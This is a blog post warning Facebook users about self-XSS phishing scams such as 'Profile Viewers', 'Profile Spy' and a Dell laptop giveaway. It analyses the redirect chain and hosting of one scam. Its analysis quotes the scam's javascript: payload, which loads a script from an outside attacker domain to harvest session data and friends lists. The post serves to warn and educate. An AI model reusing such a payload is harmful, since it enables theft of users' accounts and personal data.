Facebook Security: An Old Phishing Trick, Revived & Analyzed.

In the past, you may remember that I’ve written about many instances where Facebook users were falling for a trick where a link get’s posted on their wall asking them to click a fake link in order to gain access so some “cool” feature such as getting a free iPad, gaining access and see other people’s hidden profile information, or get free male enhancements. They all work on the same principle: a user clicks on a link that takes them to a Facebook page, which instructs them to paste a line JavaScript code into their URL bar and press enter. In turn, this tells the user’s browser to run code that can do pretty much whatever it wants to do with your Facebook session or anything else you might have open, for that matter.

For all you non-tech users out there: DON’T EVER, paste or click any link without first checking out what it may do. And as always, if it sounds too good to be true, IT PROBABLY IS!

In the rest of this post, I’ll analyze in detail, one particular phishing scheme that happened to explode all over Facebook in the last 24-ish hours. Keep in mind, most of the phishing right now is based on this. The rest of the Facebook phishing is done by sending you a fake e-mail with a link to a fake Facebook login page, which then steals your e-mail address and password.

The scam starts with a sent to you, either by e-mail, and/or posted on your wall. It looks something like this:


The link posted takes you to a facebook page that looks like this:


In this particular Facebook page, it redirects you to a 3rd party domain (kkpj.info), which takes you back to another Facebook page that looks exactly like the previous. This is done to retain a Facebook page that they can use to redirect to additional, different Facebook pages, should it be reported. In other words, if the malicious page gets reported, it would be the second one, allowing the original page to be retained and modified. I found this one because NoScript (Firefox Plugin) blocks scripts by default:


This second Facebook page looks like this:


And this one is the one that instructs you to copy and paste some code to run in your browser’s URL bar. Very bad idea for the end user. Let’s take a closer look at the code itself (this one has been de-fanged – refang at your own risk):

javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//g2ds.info/d.php?split=1rand=329154403,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */

This basically tells the browser to execute whatever scripts lie at g2ds.info/d.php with a few parameters from your current Facebook session, most prominently your friends list, but can also include your profile information (e-mail address, residence, phone numbers), or even your Facebook credentials. This kind of attack falls under the category of “User Induced Cross Site Scripting (XSS)”.

A few other interesting notes:

    kkpj.info’s index page simply redirects the user to the second Facebook page, via a JavaScript.
    Both kkpj.info and g2ds.info have the same IP address (, are registered from eNom, Inc, and are hosted by hostgator.com, as evidenced by their nameservers, NS2767.HOSTGATOR.COM, and NS2768.HOSTGATOR.COM. Private registration of these 2 domains prevent identifying details from being revealed.
    g2ds.info is the actual domain where the malicious scripts are run from.


Another Facebook Scam

Well you know about the previous Dell Facebook scam? (http://darwin-mach.net/blog/2009/12/10/dell-promotion-facebook-scam/) This one’s worse, but uses the exact same code, which does the exact same thing.

The theme now is that it claims to install “Profile Spy”, to help you see who’s looking at your profile, etc, but THERE IS NO SUCH THING. There’s only a few apps that really do this, but it requires your visitors also install the app, for the sake of their own privacy.

So… about 900,000 people have joined the Facebook group as of writing, and I reported it to Facebook again. We’ll see how long it takes them.

Here’s the link to the most recent scam – http://www.facebook.com/group.php?gid=209645259791 (you have to click on the “read more” link).

There was also another previous one before this one, but after the Dell one, involving “Crimson Labs” and a giveaway of iMacs.

Please! READ EVERYTHING CAREFULLY BEFORE YOU SAY YES. If anything looks suspicious or doesn’t make sense, well… 🙂

Dell “Promotion” Facebook Scam

Hi all,

I just wanted to alert you on a new scam that is going around on Facebook. It comes in the form of an invite to a group called “Dell Laptop Giveaway (1 in 2 people win one Laptop)” at http://www.facebook.com/group.php?gid=355563360211

BEWARE! The instructions stated actually collects your entire friends list and spams them with this invite and in no way enters you into any sweepstakes. This is another classic example of a deal too good to be true. As of writing this post, about 47000 people have joined the group and likely fell for this trick.

Resolution: IGNORE the invite and help spread the word about it. Do NOT do what the instructions tell you to do.

EDIT (11:53 EST): Looks like Facebook took down that rather quickly after I reported it. But still a lesson to be learned about carefully reading what you see.

Read more